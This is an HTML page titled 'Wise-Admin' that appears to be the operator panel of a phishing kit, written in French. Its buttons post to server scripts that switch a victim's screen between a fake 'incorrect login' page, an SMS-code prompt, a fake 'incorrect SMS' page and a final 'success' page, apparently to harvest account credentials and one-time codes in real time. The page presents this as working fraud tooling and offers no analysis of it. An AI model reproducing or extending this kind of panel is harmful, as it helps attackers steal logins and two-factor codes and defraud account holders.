<!DOCTYPE html>
<html lang="en">
<head>
<title>Wise-Admin</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
</head>
<body>

<div class="container">

  <h3> 

		 <img  src="https://images.squarespace-cdn.com/content/v1/58775efdd482e90f8535f34f/1613728292558-VRKWPOW5ZKC6BWWHCYAB/primary-small.png" width="20%" alt="">
  PANEL ADMIN</h3>
  <br/>
  <p><h4>Utiliser l'une des options ci-dessous pour controler le système et cliquez sur <a>valider</a> pour la prise en compte:</h4></p>
  <br/>
 
   <table class="table table-bordered">
    
    <tbody>
      <tr>
        <td><h4>1 - Séléctionner la page de login incorrecte </h4></td>
        <td><form method="post"  action="./auto_system/Select_Login.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textLogin">    <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr> 
	  
	 <tr>
        <td><h4>2 - Séléctionner la page de Code SMS  </h4></td>
        <td><form method="post"  action="./auto_system/Select_Sms.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textSmsphone">    <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr>
	  
     
      <tr>
        <td><h4>3 - Séléctionner la page SMS incorrecte </h4></td>
        <td><form method="post"  action="./auto_system/Select_Sms_fake.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textSMSfake">    <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr>
	  
	     <tr>
        <td><h4>4 - Séléctionner la page succès << FIN >>  </h4></td>
        <td><form method="post"  action="./auto_system/Select_Exit.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textExit">    <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr>
    </tbody>
  </table>
</div>

</body>
</html>
